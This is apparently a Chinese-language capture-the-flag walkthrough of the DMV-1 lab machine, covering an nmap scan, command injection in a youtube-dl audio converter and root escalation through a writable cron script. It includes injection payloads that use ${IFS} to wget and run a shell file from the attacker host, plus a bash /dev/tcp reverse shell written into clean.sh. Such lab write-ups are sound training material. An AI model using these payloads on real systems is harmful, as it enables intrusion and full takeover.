DMV-1

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-09 03:04 EST
Nmap scan report for 192.168.93.135
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_  256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:9E:3B:DC (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.93.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

80页面貌似是个音频转换的服务

抓包可以看到报错信息,得知有个叫youtube-dl的服务

github上瞅瞅发现是个高达87k的项目

命令执行获取shell

抓包测试发现存在命令执行

但是貌似空格出了点问题,${IFS}试试

尝试反弹shell,bash失败,python失败

尝试wget下载文件到目标主机执行

1
1;wget${IFS}http://192.168.93.129/shell.txt;

1
1;bash${IFS}shell.txt;

特权文件提权

只有一个用户

上传pspy64我们可以看到目标主机会自动执行两个文件,都是root权限

cloud-id是root权限我们动不了,但是clean.sh是www-data可读可写

那么直接写入bash命令反弹即可

1
bash -i >& /dev/tcp/192.168.93.129/4444 0>&1

等待执行

root目录下找到第二个flag